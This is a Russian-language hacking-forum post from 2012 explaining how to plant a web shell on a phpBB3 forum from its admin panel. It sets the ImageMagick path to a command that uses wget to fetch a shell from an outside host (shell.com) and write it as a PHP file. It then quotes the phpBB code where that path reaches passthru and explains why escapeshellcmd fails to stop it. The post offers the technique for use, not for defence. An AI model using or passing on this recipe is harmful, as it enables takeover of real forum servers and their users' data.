Тема: phpbb3 shell help
Показать сообщение отдельно
Старый 22.04.2012, 23:23   #6
Лаврушкин
 
Регистрация: 05.07.2010
Сообщений: 27
Репутация: 15
По умолчанию

Навеяло пред темой.
Идем в General->Attachment settings
Ставим галочки на Allow attachments,Display images inline,Create thumbnail
Там есть Imagemagick path: херачим туда что то вроде
PHP код:
sh -'wget -O /кудабудемлитьшелл/sh.php http://shell.com/shell.txt' 
Потом идем в любую тему на форуме..и аттачим любую картинку.
в этот момент в файле includes/functions_posting.php
PHP код:
    if ($config['img_imagick'] && function_exists('passthru')) 
    { 
        if (
substr($config['img_imagick'], -1) !== '/'
        { 
            
$config['img_imagick'] .= '/'
        } 

        @
passthru(escapeshellcmd($config['img_imagick']) . 'convert' . ((defined('PHP_OS') && preg_match('#^win#i'PHP_OS)) ? '.exe' '') . ' -quality 85 -geometry ' $new_width 'x' $new_height ' "' str_replace('\\''/'$source) . '" "' str_replace('\\''/'$destination) . '"'); 

        if (
file_exists($destination)) 
        { 
            
$used_imagick true
        } 
    } 
в функцию passthru попадёт Imagemagick path. escapeshellcmd успешно пропустит кавычки. т.к Символы ' и " экранируются только в том случае, если они встречаются не попарно.
Борода в конце не помешает.
Зависимость естественно safe_mode = Off
Лаврушкин вне форума   Ответить с цитированием